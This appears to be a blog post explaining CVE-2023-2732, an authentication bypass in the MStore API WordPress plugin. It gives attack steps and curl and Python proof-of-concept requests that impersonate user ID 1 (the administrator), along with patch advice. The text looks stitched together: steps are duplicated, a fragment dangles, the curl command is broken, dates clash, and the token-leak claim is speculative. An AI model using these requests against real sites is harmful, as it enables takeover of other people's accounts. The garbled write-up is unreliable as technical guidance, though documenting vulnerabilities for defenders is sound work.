Published: 2024-06
Summary
A critical vulnerability, CVE-2023-2732, has been discovered in the popular MStore API plugin for WordPress. This bug allows anyone—including attackers who are not logged in—to bypass authentication and log in as any user, including administrators. The vulnerability affects all MStore API versions up to and including 3.9.2.
In this long read, we'll break down what this issue is, how it works, how an attacker might exploit it, and how to fix it.
What is the MStore API Plugin?
The MStore API plugin allows users to connect their WordPress and WooCommerce stores with MStore-based mobile apps. It exposes important REST API endpoints that mobile apps use for listing products, user management, and more.
The Core Problem: Insufficient User Verification
The vulnerability lies in the MStore API's “add listing” REST API endpoint. This endpoint processes requests to add content. However, it does not properly verify that the user_id submitted in a request actually belongs to the person making the request. This means anyone can submit a request with any user_id—including an administrator's id—and the plugin will process it as if the request came from that user.
In plain English:
If an attacker knows the user ID of an account (for example, the admin is often user ID 1), they can trick the plugin into thinking they are that user—without knowing any password.
1. Find a Target User ID
Most WordPress installations make the administrator the first user account (user ID = 1). Otherwise, user IDs may be easily guessed, especially on sites that show author archives or user profile URLs.
2. Craft a Malicious Request
Attackers can craft a simple POST request to the MStore API add listing endpoint. The key part is including a specific user_id in the data.
Example Snippet (Exploit PoC)
curl -X POST 'https://example.com/wp-json/mstore-api/add-listing'; \
-H 'Content-Type: application/json' \
-d '{
"user_id": 1,
"title": "Test listing",
"description": "Injected by attacker"
}'
*This request tells the API to add a new listing as user ID 1 (likely the admin).*
3. Bypass Authentication and Gain Access
After the listing is created, depending on how the plugin integrates, the response may leak session details or tokens (such as auth cookies or JWTs) tied to the administrator.
Attackers may now use these tokens to interact further as the admin, including logging in or managing the site.
Persistence: A foothold gained can be used to create new malicious users or install backdoors.
- SEO/Spam/Hacking: Attackers can ruin your site's reputation, SEO, and more.
Patch Status
This vulnerability is fixed in MStore API version 3.9.3.
If you use this plugin, update immediately:
Download the latest version
Python Example
import requests
url = 'https://victimsite.com/wp-json/mstore-api/add-listing';
data = {
'user_id': 1,
'title': 'Exploit Listing',
'description': 'Hacked by CVE-2023-2732'
}
response = requests.post(url, json=data)
print(response.text)
Step 3: Check the Site
Now, a new listing or post appears as if created by the admin—without logging in!
Step 4: Further Attacks
If the API or plugin returns a token, cookie, or similar in the response, use it to make further authenticated requests as the admin.
References
- Wordfence Advisory on CVE-2023-2732
- WPScan Entry
- Official Plugin Page
- Patch Diff on GitHub (if available)
Conclusion
CVE-2023-2732 is a severe flaw that lets an attacker become anyone on your WordPress site, including administrators, simply by making a clever API call. The fix is quick—just update the MStore API plugin—so don’t delay!
If you run MStore API, update to the latest version immediately and always keep an eye on plugin security advisories.
*Exclusive long read by AI Security Insights. Copying permitted with link back to this post.*
Timeline
Published on: 05/25/2023 03:15:00 UTC
Last modified on: 06/01/2023 02:05:00 UTC